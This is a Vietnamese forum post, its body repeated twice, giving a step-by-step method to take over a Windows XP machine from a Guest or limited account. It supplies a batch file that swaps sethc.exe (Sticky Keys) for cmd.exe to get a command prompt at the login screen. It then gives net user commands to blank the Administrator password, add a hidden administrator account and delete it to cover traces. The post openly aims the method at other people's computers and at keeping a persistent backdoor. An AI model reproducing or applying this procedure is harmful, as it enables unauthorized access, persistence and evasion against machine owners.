Hack Password của Administrator trong Windows XP
Trang 1 trong tổng số 1 trang
Hack Password của Administrator trong Windows XP
Nếu có trong tay đĩa Hiren’s boot thì công việc trở nên đơn giản.
Nhưng với những người ko có đĩa lại còn ko có cả ổ đĩa như tôi thì ... pó tay sao ?!?
Còn có cách khác là sử dụng công cụ dò tìm pass trên mạng.
Nhưng ko phải lúc nào cũng có công cụ trong tay, và ko phải lúc nào cũng thành công.
Sau dây là 1 bài hướng dẫn đoạt quyền administrator bằng quyền Guest hoặc Limited mà tôi sưu tầm được.
Bài viết này đc thực hiện dựa trên lỗ hổng của file sethc.exe trên Windows.
Bước 1:
Vào windows với tài khoản User bình thường và nhấn 5 lần phím Shift để gọi thử chương trình StickyKey trên Windows và đóng nó lại (chỉ nhằm để thử).
Bước 2:
Vào Start >> Run >> gõ Notepad và Enter.
Copy đoạn mã này paste vào notepad, Save lại với tên là Hackpass.bat( Save vào system32)
Trích dẫn:
cd %systemroot%/system32
rename sethc.exe sethc.exe.bk
copy cmd.exe sethc.exe /y
Sau đó nháy kép chuột lên file Hackpass.bat để thực thi!
Ðoạn mã này làm các nhiệm vụ sau:
1. Sao lưu file sethc.exe b?ng cách đổi lại tên là sethc.exe.bk
2. Thay thế file sethc.exe bằng file cmd.exe
Đến đây, bạn log off user đang dùng (Guest hoặc Limited user) rồi từ cửa sổ chờ Login vào Windows, nhấp phím Shift 5 lần, nếu chương trình Command Run được gọi thay vì chương trình StickyKey thì bạn đã thành công! Bạn đang có toàn quyền với hệ thống với cửa sổ Command Run này. Chú ý là bạn sẽ không thực hiện được các bước tiếp theo nếu thao tác trên cửa sổ Command Run trong tài khoản Guest hay Limited mà không Log off nó.
Chương trình StickyKey đã được thay bằng Command Run
Thật ra, với cách này, các bạn có thể biến đổi tùy ý các Users trên máy, kể cả các Admin khác. Muốn đổi pw một user có sẵn trong máy, ta xem có những users nào đang có trên máy (kể cả users ẩn):
Trích dẫn:
net user
Xóa trắng password của Administrator (hay tương tự với bất kì user nào):
Trích dẫn:
net user Administrator
Thêm một tài khoản Moi với mật khẩu là 123
Trích dẫn:
net user Moi 123 /add
Gán tài khoản Moi vào nhóm quản trị (sau bước này tài khoản Moi mới có quyền Adminitrators):
Trích dẫn:
net localgroup Administrators Moi /add
Nếu bạn sử dụng đúng cấu trúc lệnh phía trên, bạn sẽ tạo đc các tài khoản mới. Tại đây, bạn có thể đăng nhập vào các tài khoản mới mà không cần khởi động lại máy!
Sau khi dùng xong tài khoản Moi, xóa nó đi để giấu dấu vết (các thư mục và dữ liệu của User này vẫn còn trong máy, để sau này ... tạo lại user ... dùng tiếp (kể ra ai tinh ý sẽ thấy nó).
Trích dẫn:
net user Moi /delete
--------------
Cuối cùng, nếu thư mục system32 đc bảo vệ bằng soft tương tự Folder Lock, thì các bạn phải Reset acc Admin . Khi reset xong Administrators pw, ta có thể chạy file Hackpass.bat ở trên trong Safe Mode (đảm bảo việc sao lưu và đổi tên không có gì cản trở bằng bất kì phần mềm gì) để sau này, không cần đăng nhập gì, cứ Shift 5 lần là sẽ có cửa sổ Command cho ta ... tùy ý thao tác...
Nếu bạn dùng cách này trong máy của người khác thì tất nhiên, sau khi xóa trắng pw Adminitrators, chủ máy sẽ biết, và họ sẽ có những thay đổi. Họ sẽ cố gắng tìm mọi cách ngăn cản chúng ta xâm nhập máy họ, nhưng nếu cmd.exe (đã đổi tên) vẫn tồn tại trong System32, thì ta vẫn hoàn toàn làm chủ tình thế. Nhớ là, tạo mới acc Admin xong, nhớ xóa đi để xóa dấu vết.
Nhưng với những người ko có đĩa lại còn ko có cả ổ đĩa như tôi thì ... pó tay sao ?!?
Còn có cách khác là sử dụng công cụ dò tìm pass trên mạng.
Nhưng ko phải lúc nào cũng có công cụ trong tay, và ko phải lúc nào cũng thành công.
Sau dây là 1 bài hướng dẫn đoạt quyền administrator bằng quyền Guest hoặc Limited mà tôi sưu tầm được.
Bài viết này đc thực hiện dựa trên lỗ hổng của file sethc.exe trên Windows.
Bước 1:
Vào windows với tài khoản User bình thường và nhấn 5 lần phím Shift để gọi thử chương trình StickyKey trên Windows và đóng nó lại (chỉ nhằm để thử).
Bước 2:
Vào Start >> Run >> gõ Notepad và Enter.
Copy đoạn mã này paste vào notepad, Save lại với tên là Hackpass.bat( Save vào system32)
Trích dẫn:
cd %systemroot%/system32
rename sethc.exe sethc.exe.bk
copy cmd.exe sethc.exe /y
Sau đó nháy kép chuột lên file Hackpass.bat để thực thi!
Ðoạn mã này làm các nhiệm vụ sau:
1. Sao lưu file sethc.exe b?ng cách đổi lại tên là sethc.exe.bk
2. Thay thế file sethc.exe bằng file cmd.exe
Đến đây, bạn log off user đang dùng (Guest hoặc Limited user) rồi từ cửa sổ chờ Login vào Windows, nhấp phím Shift 5 lần, nếu chương trình Command Run được gọi thay vì chương trình StickyKey thì bạn đã thành công! Bạn đang có toàn quyền với hệ thống với cửa sổ Command Run này. Chú ý là bạn sẽ không thực hiện được các bước tiếp theo nếu thao tác trên cửa sổ Command Run trong tài khoản Guest hay Limited mà không Log off nó.
Chương trình StickyKey đã được thay bằng Command Run
Thật ra, với cách này, các bạn có thể biến đổi tùy ý các Users trên máy, kể cả các Admin khác. Muốn đổi pw một user có sẵn trong máy, ta xem có những users nào đang có trên máy (kể cả users ẩn):
Trích dẫn:
net user
Xóa trắng password của Administrator (hay tương tự với bất kì user nào):
Trích dẫn:
net user Administrator
Thêm một tài khoản Moi với mật khẩu là 123
Trích dẫn:
net user Moi 123 /add
Gán tài khoản Moi vào nhóm quản trị (sau bước này tài khoản Moi mới có quyền Adminitrators):
Trích dẫn:
net localgroup Administrators Moi /add
Nếu bạn sử dụng đúng cấu trúc lệnh phía trên, bạn sẽ tạo đc các tài khoản mới. Tại đây, bạn có thể đăng nhập vào các tài khoản mới mà không cần khởi động lại máy!
Sau khi dùng xong tài khoản Moi, xóa nó đi để giấu dấu vết (các thư mục và dữ liệu của User này vẫn còn trong máy, để sau này ... tạo lại user ... dùng tiếp (kể ra ai tinh ý sẽ thấy nó).
Trích dẫn:
net user Moi /delete
--------------
Cuối cùng, nếu thư mục system32 đc bảo vệ bằng soft tương tự Folder Lock, thì các bạn phải Reset acc Admin . Khi reset xong Administrators pw, ta có thể chạy file Hackpass.bat ở trên trong Safe Mode (đảm bảo việc sao lưu và đổi tên không có gì cản trở bằng bất kì phần mềm gì) để sau này, không cần đăng nhập gì, cứ Shift 5 lần là sẽ có cửa sổ Command cho ta ... tùy ý thao tác...
Nếu bạn dùng cách này trong máy của người khác thì tất nhiên, sau khi xóa trắng pw Adminitrators, chủ máy sẽ biết, và họ sẽ có những thay đổi. Họ sẽ cố gắng tìm mọi cách ngăn cản chúng ta xâm nhập máy họ, nhưng nếu cmd.exe (đã đổi tên) vẫn tồn tại trong System32, thì ta vẫn hoàn toàn làm chủ tình thế. Nhớ là, tạo mới acc Admin xong, nhớ xóa đi để xóa dấu vết.
Dang Hong Phuc (PT1)- Tổng số bài gửi : 125
Join date : 19/09/2010
Similar topics
» 3 cách kích hoạt tài khoản Administrator trong Windows 8
» Đặt Password bảo vệ File và Folder trong Windows XP
» công cụ quản lý từ xa trên windows 7 Remote Server Administrator Tool
» Phương pháp khôi phục lại password trong hệ thống Win2k/XP/2K3 (Support NTFS)
» Phương pháp khôi phục lại password trong hệ thống Win2k/XP/2K3 (Support NTFS)
» Đặt Password bảo vệ File và Folder trong Windows XP
» công cụ quản lý từ xa trên windows 7 Remote Server Administrator Tool
» Phương pháp khôi phục lại password trong hệ thống Win2k/XP/2K3 (Support NTFS)
» Phương pháp khôi phục lại password trong hệ thống Win2k/XP/2K3 (Support NTFS)
Trang 1 trong tổng số 1 trang
Permissions in this forum:
Bạn không có quyền trả lời bài viết